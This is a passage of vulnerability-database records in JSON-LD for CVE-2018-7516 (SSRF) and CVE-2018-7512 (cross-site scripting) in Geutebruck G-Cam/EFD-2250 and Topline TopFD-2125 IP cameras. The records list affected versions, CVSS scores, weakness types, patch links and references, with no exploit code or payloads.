            "trust": 0.9
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06022",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003342",
            "trust": 0.8
          },
          {
            "db": "IVD",
            "id": "E2E7221E-39AB-11E9-A995-000C29342CB1",
            "trust": 0.2
          },
          {
            "db": "VULHUB",
            "id": "VHN-137548",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e7221e-39ab-11e9-a995-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06022"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137548"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003342"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-765"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7516"
          }
        ]
      },
      "id": "VAR-201803-2210",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "IVD",
            "id": "e2e7221e-39ab-11e9-a995-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06022"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137548"
          }
        ],
        "trust": 1.7456349166666667
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT",
              "ICS",
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          },
          {
            "category": [
              "ICS"
            ],
            "sub_category": null,
            "trust": 0.2
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e7221e-39ab-11e9-a995-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06022"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:53:17.738000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.geutebrueck.com/en_EN.html"
          },
          {
            "title": "Patch for Geutebruck IPCameras Cross-Site Request Forgery Vulnerability (CNVD-2018-06022)",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/122841"
          },
          {
            "title": "Geutebr\u00fcck G-Cam/EFD-2250  and Topline TopFD-2125 Security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79351"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-06022"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003342"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-765"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-918",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-137548"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003342"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7516"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.4,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-079-01"
          },
          {
            "trust": 1.7,
            "url": "http://www.securityfocus.com/bid/103474"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7516"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7516"
          },
          {
            "trust": 0.3,
            "url": "http://www.geutebrueck.com/en_en/product-overview-31934.html"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-06022"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137548"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003342"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-765"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7516"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "IVD",
            "id": "e2e7221e-39ab-11e9-a995-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06022"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137548"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003342"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-765"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7516"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-03-22T00:00:00",
            "db": "IVD",
            "id": "e2e7221e-39ab-11e9-a995-000c29342cb1"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-06022"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "VULHUB",
            "id": "VHN-137548"
          },
          {
            "date": "2018-03-20T00:00:00",
            "db": "BID",
            "id": "103474"
          },
          {
            "date": "2018-05-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-003342"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201803-765"
          },
          {
            "date": "2018-03-22T18:29:00.900000",
            "db": "NVD",
            "id": "CVE-2018-7516"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-06022"
          },
          {
            "date": "2019-10-09T00:00:00",
            "db": "VULHUB",
            "id": "VHN-137548"
          },
          {
            "date": "2018-03-20T00:00:00",
            "db": "BID",
            "id": "103474"
          },
          {
            "date": "2018-05-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-003342"
          },
          {
            "date": "2019-10-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201803-765"
          },
          {
            "date": "2024-11-21T04:12:16.843000",
            "db": "NVD",
            "id": "CVE-2018-7516"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-765"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Geutebruck G-Cam/EFD-2250 and  Topline TopFD-2125 Server-side request forgery vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003342"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Code problem",
        "sources": [
          {
            "db": "IVD",
            "id": "e2e7221e-39ab-11e9-a995-000c29342cb1"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-765"
          }
        ],
        "trust": 0.8
      }
    }

    VAR-201803-2207

    Vulnerability from variot - Updated: 2024-11-23 21:53

    A cross-site scripting vulnerability has been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which may allow remote code execution. Geutebruck G-Cam/EFD-2250 and Topline TopFD-2125 Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. The G-Cam/EFD-2250 and ToplineTopFD-2125 are both high-definition cameras from Geutebruck. Multiple Geutebruck devices are prone to the following multiple security vulnerabilities. 1. An authentication-bypass vulnerability 2. A SQL-injection vulnerability 3. A cross-site request-forgery vulnerability 4. An access-bypass vulnerability 5. A security-bypass vulnerability 6. A cross-site scripting vulnerability Attackers may exploit these issues to gain unauthorized access to the affected device, or to bypass certain security restrictions to perform unauthorized actions, to compromise the application to access or modify data and to exploit vulnerabilities in the underlying database, to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site or to execute arbitrary code within the context of the affected device. The following devices are vulnerable: Geutebruck G-Cam/EFD-2250 version 1.12.0.4 Geutebruck Topline TopFD-2125 version 3.15.1. Geutebrück G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of German Geutebrück company

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201803-2207",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-cam/efd-2250",
            "scope": "eq",
            "trust": 1.7,
            "vendor": "geutebruck",
            "version": "1.12.0.4"
          },
          {
            "model": "topfd-2125",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "geutebrueck",
            "version": "3.15.1"
          },
          {
            "model": "g-cam\\/efd-2250",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "geutebrueck",
            "version": "1.12.0.4"
          },
          {
            "model": "topline topfd-2125",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "geutebruck",
            "version": "3.15.1"
          },
          {
            "model": "topfd-2125",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "3.15.1"
          },
          {
            "model": "g-cam/efd-2250",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.19"
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "g cam efd 2250",
            "version": "1.12.0.4"
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "topfd 2125",
            "version": "3.15.1"
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06023"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003341"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-766"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7512"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam%2fefd-2250_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:topfd-2125_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003341"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Davy Douhine of RandoriSec and Nicolas Mattiocco of Greenlock.",
        "sources": [
          {
            "db": "BID",
            "id": "103474"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2018-7512",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2018-7512",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2018-06023",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "IVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.2,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.9 [IVD]"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "VHN-137544",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 6.1,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 2.8,
                "id": "CVE-2018-7512",
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.8,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2018-7512",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2018-7512",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2018-06023",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201803-766",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "IVD",
                "id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1",
                "trust": 0.2,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-137544",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06023"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137544"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003341"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-766"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7512"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A cross-site scripting vulnerability has been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which may allow remote code execution. Geutebruck G-Cam/EFD-2250 and Topline TopFD-2125 Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. The G-Cam/EFD-2250 and ToplineTopFD-2125 are both high-definition cameras from Geutebruck. Multiple Geutebruck devices are prone to the following multiple security vulnerabilities. \n1. An authentication-bypass vulnerability\n2. A SQL-injection vulnerability\n3. A cross-site request-forgery vulnerability\n4. An access-bypass vulnerability\n5. A security-bypass vulnerability\n6. A cross-site scripting vulnerability\nAttackers may exploit these issues to gain unauthorized access to the   affected device, or to bypass certain security restrictions to perform  unauthorized actions, to compromise the application to access or modify  data and to exploit vulnerabilities in the underlying database, to  execute arbitrary script code in the browser of an unsuspecting user in  the context of the affected site or to  execute arbitrary code within  the context of the  affected device. \nThe following devices are vulnerable:\nGeutebruck G-Cam/EFD-2250 version 1.12.0.4\nGeutebruck Topline TopFD-2125 version 3.15.1. Geutebr\u00fcck G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of German Geutebr\u00fcck company",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-7512"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003341"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06023"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "IVD",
            "id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137544"
          }
        ],
        "trust": 2.7
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2018-7512",
            "trust": 3.6
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-18-079-01",
            "trust": 3.4
          },
          {
            "db": "BID",
            "id": "103474",
            "trust": 2.0
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-766",
            "trust": 0.9
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06023",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003341",
            "trust": 0.8
          },
          {
            "db": "IVD",
            "id": "E2E6FB0F-39AB-11E9-B666-000C29342CB1",
            "trust": 0.2
          },
          {
            "db": "VULHUB",
            "id": "VHN-137544",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06023"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137544"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003341"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-766"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7512"
          }
        ]
      },
      "id": "VAR-201803-2207",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "IVD",
            "id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06023"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137544"
          }
        ],
        "trust": 1.7456349166666667
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "ICS",
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          },
          {
            "category": [
              "ICS"
            ],
            "sub_category": null,
            "trust": 0.2
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06023"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:53:17.699000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.geutebrueck.com/en_EN.html"
          },
          {
            "title": "Patch for Geutebruck IPCameras Cross-Site Scripting Vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/122839"
          },
          {
            "title": "Geutebr\u00fcck G-Cam/EFD-2250  and Topline TopFD-2125 Fixes for cross-site scripting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79352"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-06023"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003341"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-766"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-137544"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003341"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7512"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.4,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-079-01"
          },
          {
            "trust": 1.7,
            "url": "http://www.securityfocus.com/bid/103474"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7512"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7512"
          },
          {
            "trust": 0.3,
            "url": "http://www.geutebrueck.com/en_en/product-overview-31934.html"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-06023"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137544"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003341"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-766"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7512"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "IVD",
            "id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06023"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137544"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003341"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-766"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7512"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-03-22T00:00:00",
            "db": "IVD",
            "id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-06023"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "VULHUB",
            "id": "VHN-137544"
          },
          {
            "date": "2018-03-20T00:00:00",
            "db": "BID",
            "id": "103474"
          },
          {
            "date": "2018-05-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-003341"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201803-766"
          },
          {
            "date": "2018-03-22T18:29:00.837000",
            "db": "NVD",
            "id": "CVE-2018-7512"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-06023"
          },
          {
            "date": "2019-10-09T00:00:00",
            "db": "VULHUB",
            "id": "VHN-137544"
          },
          {
            "date": "2018-03-20T00:00:00",
            "db": "BID",
            "id": "103474"
          },
          {
            "date": "2018-05-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-003341"
          },
          {
            "date": "2019-10-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201803-766"
          },
          {
            "date": "2024-11-21T04:12:16.423000",
            "db": "NVD",
            "id": "CVE-2018-7512"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-766"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Geutebruck IP Cameras Cross-Site Scripting Vulnerability",
        "sources": [
          {
            "db": "IVD",
            "id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06023"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-766"
          }
        ],
        "trust": 0.6
      }
    }

